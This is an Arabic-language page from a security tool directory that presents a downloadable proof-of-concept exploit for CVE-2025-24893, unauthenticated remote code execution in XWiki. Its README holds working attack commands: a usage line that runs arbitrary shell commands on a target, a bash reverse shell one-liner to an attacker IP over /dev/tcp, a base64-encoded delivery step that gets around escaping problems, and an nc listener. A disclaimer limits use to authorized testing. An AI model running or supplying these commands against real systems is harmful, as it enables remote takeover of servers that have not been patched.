Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893-PoC — استغلال إثبات المفهوم لـ CVE-2025-24893 يتيح تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه على XWiki مع أوامر قشرة عشوائية وحقن قشرة عكسية عبر Python. | Kitploit
أدوات/GitHubGitHub/dhiaznaidi/cve-2025-24893-poc
الاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubdhiaznaidi/cve-2025-24893-poc

CVE-2025-24893-PoC

استغلال إثبات المفهوم لـ CVE-2025-24893 يتيح تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه على XWiki مع أوامر قشرة عشوائية وحقن قشرة عكسية عبر Python.

عرض المستودع
4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24893 - تنفيذ الكود عن بُعد في XWiki (RCE)

استغلال محدّث لإثبات المفهوم (PoC) لثغرة CVE-2025-24893، وهي ثغرة RCE حرجة بدون مصادقة في XWiki. يحسّن هذا الإصدار الإصدار الأصلي من خلال السماح بتنفيذ أوامر شل تعسفية وحقن شل عكسي نظيف.

بواسطة: HexHunter404


⚠️ تحذير

هذا الكود مقدم لأغراض التعليم واختبار الاختراق المصرح به فقط.
لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


✨ الميزات

  • يدعم تنفيذ الأوامر عبر bash -c '<command>'
  • يدعم القشور العكسية بشكل كامل (عبر base64 لتجاوز مشاكل Groovy)
  • تحسين التعامل مع مخرجات الأوامر
  • يحافظ على مسار /xwiki ويتجنب حلقات إعادة التوجيه

🐍 الاستخدام

python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"

🐚 الحصول على شل عكسي

. قم بترميز الشل العكسي باستخدام base64

echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64

. أرسله باستخدام الـ PoC

python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"

. قم بإعداد المستمع الخاص بك

nc -lvnp 4444

إذا نجحت، ستحصل على شل.

تنزيل الأداة